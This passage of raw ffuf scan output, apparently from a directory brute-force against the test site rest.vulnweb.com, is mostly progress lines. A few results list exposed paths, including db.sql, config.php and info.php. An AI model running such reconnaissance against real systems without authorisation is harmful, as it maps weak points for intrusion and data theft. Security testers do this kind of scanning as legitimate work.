56 ::\n\u001b[2K:: Progress: [1471/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1475/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1484/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1498/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1500/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1506/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:00:56] :: Errors: 56 ::\n\u001b[2K:: Progress: [1509/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1520/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1520/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1520/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1523/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1547/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1548/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1548/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:57] :: Errors: 56 ::\n\u001b[2K:: Progress: [1548/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1549/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1577/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1579/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1579/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1580/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1580/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1601/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:00:58] :: Errors: 56 ::\n\u001b[2K:: Progress: [1609/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1609/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1609/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1613/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1622/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1639/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1639/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1639/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:00:59] :: Errors: 56 ::\n\u001b[2K:: Progress: [1640/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1646/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1662/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1665/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1669/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1670/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1687/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1688/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:00] :: Errors: 56 ::\n\u001b[2K:: Progress: [1696/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1699/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1715/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1716/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1716/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1719/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1732/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1741/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:01] :: Errors: 56 ::\n\u001b[2K:: Progress: [1743/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1748/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1751/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1754/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1756/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDg2ZGI=\",\"FUZZ\":\"Y29uZmlnLnBocA==\"},\"position\":1755,\"status\":200,\"length\":0,\"words\":1,\"lines\":1,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/config.php\",\"duration\":144768984,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1769/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1774/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1781/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1786/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:02] :: Errors: 56 ::\n\u001b[2K:: Progress: [1791/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1803/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1825/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1836/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1836/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1837/4842] :: Job [1/1] :: 53 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1838/4842] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1863/4842] :: Job [1/1] :: 56 req/sec :: Duration: [0:01:03] :: Errors: 56 ::\n\u001b[2K:: Progress: [1867/4842] :: Job [1/1] :: 65 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1867/4842] :: Job [1/1] :: 65 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1867/4842] :: Job [1/1] :: 65 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1869/4842] :: Job [1/1] :: 54 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1891/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1894/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1894/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1894/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:04] :: Errors: 56 ::\n\u001b[2K:: Progress: [1904/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1920/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1921/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1922/4842] :: Job [1/1] :: 56 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1924/4842] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1948/4842] :: Job [1/1] :: 59 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1953/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1953/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:05] :: Errors: 56 ::\n\u001b[2K:: Progress: [1953/4842] :: Job [1/1] :: 58 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1954/4842] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1982/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1987/4842] :: Job [1/1] :: 57 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDg3YjI=\",\"FUZZ\":\"ZGI=\"},\"position\":1970,\"status\":200,\"length\":317,\"words\":42,\"lines\":8,\"content-type\":\"application/x-sql\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/db\",\"duration\":234308636,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1987/4842] :: Job [1/1] :: 57 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1987/4842] :: Job [1/1] :: 57 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDg3YmQ=\",\"FUZZ\":\"ZGIuc3Fs\"},\"position\":1981,\"status\":200,\"length\":317,\"words\":42,\"lines\":8,\"content-type\":\"application/x-sql\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/db.sql\",\"duration\":192408103,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1988/4842] :: Job [1/1] :: 55 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1989/4842] :: Job [1/1] :: 53 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1991/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1992/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:06] :: Errors: 56 ::\n\u001b[2K:: Progress: [1994/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [1998/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2005/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2017/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2029/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2029/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2031/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2033/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:07] :: Errors: 56 ::\n\u001b[2K:: Progress: [2034/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2034/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2035/4842] :: Job [1/1] :: 40 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2041/4842] :: Job [1/1] :: 38 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2056/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2061/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2061/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2076/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:08] :: Errors: 56 ::\n\u001b[2K:: Progress: [2084/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2085/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2086/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2090/4842] :: Job [1/1] :: 40 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2096/4842] :: Job [1/1] :: 38 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2114/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2119/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2120/4842] :: Job [1/1] :: 41 req/sec :: Duration: [0:01:09] :: Errors: 56 ::\n\u001b[2K:: Progress: [2124/4842] :: Job [1/1] :: 39 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDg4MzQ=\",\"FUZZ\":\"ZG9jcy8=\"},\"position\":2100,\"status\":200,\"length\":28698,\"words\":5391,\"lines\":688,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/docs/\",\"duration\":446693431,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2125/4842] :: Job [1/1] :: 39 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2143/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2143/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2143/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2149/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2167/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2169/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2169/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:10] :: Errors: 56 ::\n\u001b[2K:: Progress: [2169/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2181/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2200/4842] :: Job [1/1] :: 53 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2200/4842] :: Job [1/1] :: 53 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2200/4842] :: Job [1/1] :: 53 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2201/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2222/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2222/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:11] :: Errors: 56 ::\n\u001b[2K:: Progress: [2222/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2222/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2224/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2230/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2240/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2247/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2251/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2255/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:12] :: Errors: 56 ::\n\u001b[2K:: Progress: [2258/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2276/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2278/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2280/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2283/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2300/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2308/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2308/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:13] :: Errors: 56 ::\n\u001b[2K:: Progress: [2308/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2319/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2334/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2334/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2335/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2335/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2352/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2364/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:14] :: Errors: 56 ::\n\u001b[2K:: Progress: [2364/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2364/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2369/4842] :: Job [1/1] :: 42 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2384/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2384/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2384/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2388/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2401/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:15] :: Errors: 56 ::\n\u001b[2K:: Progress: [2417/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2417/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2417/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2418/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2427/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2448/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2448/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2448/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:16] :: Errors: 56 ::\n\u001b[2K:: Progress: [2452/4842] :: Job [1/1] :: 44 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2473/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2473/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2475/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2475/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2482/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2506/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2506/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:17] :: Errors: 56 ::\n\u001b[2K:: Progress: [2506/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2507/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2528/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2530/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2530/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2530/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2531/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2547/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:18] :: Errors: 56 ::\n\u001b[2K:: Progress: [2561/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2561/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2561/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2562/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2570/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2592/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2592/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2592/4842] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:19] :: Errors: 56 ::\n\u001b[2K:: Progress: [2593/4842] :: Job [1/1] :: 43 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2620/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2621/4842] :: Job [1/1] :: 48 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2624/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2624/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2624/4842] :: Job [1/1] :: 49 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2626/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDhhMjY=\",\"FUZZ\":\"aW5kZXgucGhw\"},\"position\":2598,\"status\":200,\"length\":3556,\"words\":1398,\"lines\":138,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/index.php\",\"duration\":616522031,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2626/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDQ3ZDhhMzk=\",\"FUZZ\":\"aW5mby5waHA=\"},\"position\":2617,\"status\":200,\"length\":83050,\"words\":4178,\"lines\":951,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://rest.vulnweb.com/info.php\",\"duration\":263707375,\"scraper\":{},\"resultfile\":\"\",\"host\":\"rest.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2627/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2652/4842] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:20] :: Errors: 56 ::\n\u001b[2K:: Progress: [2656/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2656/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2656/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2656/4842] :: Job [1/1] :: 51 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2665/4842] :: Job [1/1] :: 45 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2686/4842] :: Job [1/1] :: 55 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2686/4842] :: Job [1/1] :: 55 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2686/4842] :: Job [1/1] :: 55 req/sec :: Duration: [0:01:21] :: Errors: 56 ::\n\u001b[2K:: Progress: [2687/4842] :: Job [1/1] :: 47 req/sec :: Duration: [0:01:22] :: Errors: 56 ::\n\u001b[2K:: Progress: [2706/4842] :: Job [1/1] :: 46 req/sec :: 